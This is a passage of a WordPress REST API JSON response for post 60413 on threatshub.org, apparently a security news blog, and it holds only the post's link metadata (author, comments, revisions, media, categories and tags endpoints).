Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/60413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=60413"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/60413\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=60413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=60413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=60413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}